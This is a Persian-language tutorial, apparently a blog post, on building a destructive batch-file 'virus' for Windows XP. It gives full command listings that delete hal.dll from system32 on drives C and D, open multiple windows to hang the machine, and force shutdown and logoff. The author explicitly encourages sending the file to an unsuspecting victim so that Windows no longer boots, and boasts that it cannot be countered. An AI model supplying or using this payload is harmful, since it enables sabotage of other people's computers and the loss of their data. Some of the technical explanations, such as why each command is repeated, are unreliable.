من طی فعالیت هایی که برای ساخت
ویروس کردم، متوجه شدم که ویندوز اکس پی به یک فایل موجود درایو ویندوز
Windows > system32 >hal.dll بیشترین نیاز را دارد. که می توان
ویندوز اکس پی را با پاک کردن hal.dll از کار انداخت. خوب، چگونه برای این
فایل بچ فایل بسازیم؟
1- نرم افزار notepad را باز کنید و دستور زیر را در آن کپی کنید:
del C:\WINDOWS\system32\hal.dll
2- از منوی فایل، ...save as را انتخاب کنید و با هر نامی که دوست دارید ولی با پسوند bat.* ذخیره کنید.
اینجا یک نکته هست، که ما از کجا بدانیم درایو ویندوز طرف مقابل در \:C
است؟ خوب، برای اینکه این بچ فایل حتماً ویندوز طرف را از کار بیندازد،
کافیست دو بار دستور del را با درایوهای مختلف تغییر دهید. ولی هر دستور
را 4 بار بنویسد. حتماً از خود سوال می کنید چرا؟ ... به علت اینکه
دستورات فرصت اجرا داشته باشند. دستور زیر را در notepade کپی کنید:
del C:\WINDOWS\system32\hal.dll
del C:\WINDOWS\system32\hal.dll
del C:\WINDOWS\system32\hal.dll
del C:\WINDOWS\system32\hal.dll
del d:\WINDOWS\system32\hal.dll
del d:\WINDOWS\system32\hal.dll
del d:\WINDOWS\system32\hal.dll
del d:\WINDOWS\system32\hal.dll
حالا این برنامه را با هر نامی که دوست دارید اما با پسوند bat.* ذخیره کنید.
حالا اگر این فایل را برای طرف مقابل بفرستید، فرد با اجرا کردن این فایل
متوجه هیچ چیز نمی شود. اما بعد از راه اندازی مجدد، مشاهده می شود که
ویندوز بالا نمی آید.
چگونه به این ویروس قدرت بیشتری بدهیم؟
طریقه ساخت ویروس دوم هم خیلی ساده هست. این از ضعف های ویندوز هست که با
دو کلمه هنگ کند. کافیست در ادامه دستورات بالا، این دستور را تایپ کنید:
start pager
start pager
start pager
من سه بار این دستور را نوشتم. علتش این است که صفحات زیاد تری باز شود تا کامپیوتر هنگ کند. خوب، حالا شد:
del C:\WINDOWS\system32\hal.dll
del C:\WINDOWS\system32\hal.dll
del C:\WINDOWS\system32\hal.dll
del C:\WINDOWS\system32\hal.dll
del d:\WINDOWS\system32\hal.dll
del d:\WINDOWS\system32\hal.dll
del d:\WINDOWS\system32\hal.dll
del d:\WINDOWS\system32\hal.dll
start pager
start pager
start pager
دقت کنید این فایل را باید با نام pager.bat ذخیره کنید. در غیر این صورت
ویروس اجرا نمی شود. با اجرای این فایل، تعدادی صفحه Command Prompt باز
می شود و فایل dll حذف می شود. این ویروس را در سیستم خود اجرا نکنید یا
اگر قصد عوض کردن ویندوز را دارید، اجرا کنید.
حالا شما می توانید ویروس بلاستر را اضافه کنید:
shutdown -s -c "shutdown your computer" -t 20
- دستور بالا کامپیوتر را بعد از 20 ثانیه خاموش میکند که با دستور t 20- مشخص شده است.
- دستور "c "shutdown your computer- نمایش پیغام در کادر می باشد.
- دستور shutdown -s یعنی خاموش شدن کامپیوتر که برای اجرای دستورات استفاده می شود.
نکته اینجاست که طرف مقابل با زدن دستور shutdown -a می تواند دستور را
لغو کند. شاید می گویید مگر دستور start pager باعث هک سیستم نمی شود؟
باید بگویم در سیستم های با RAM و CPU قوی امکان دارد هنگ نکند. برای
اینکه این ویروس در سیستم های قوی هم اثر داشته باشد، کافیست دستور logoff
را به دستوراتتان اضافه کنید و دستور start pager را کاملاً پاک کنید.
یعنی دستور می شود:
del C:\WINDOWS\system32\hal.dll
del C:\WINDOWS\system32\hal.dll
del C:\WINDOWS\system32\hal.dll
del C:\WINDOWS\system32\hal.dll
del d:\WINDOWS\system32\hal.dll
del d:\WINDOWS\system32\hal.dll
del d:\WINDOWS\system32\hal.dll
del d:\WINDOWS\system32\hal.dll
shutdown -s -c "shutdown your computer" -t 20
shutdown -s -c "shutdown your computer" -t 20
shutdown -s -c "shutdown your computer" -t 20
shutdown -s -c "shutdown your computer" -t 20
logoff
logoff
این دستورات را با هر نامی که دوست دارید ذخیره کنید ولی با پسوند bat.*
... این فایل در مرحله اول فایل اصلی ویندوز را پاک می کند و در مرحله دوم
logoff می کند و در مرحله سوم کادر shutdown ظاهر می شود که باعث می شود
طرف مقابل نتواند دستور shutdown -a را اجرا کند.
نتیجه اینکه طرف یا صبر می کند تا کامپیوترش خاموش بشود یا آنرا Restart
می کند که ویندوز در هر دو صورت بالا نمی آید (این ویروس راه مقابله
ندارد).
عالی عالی عالی!!!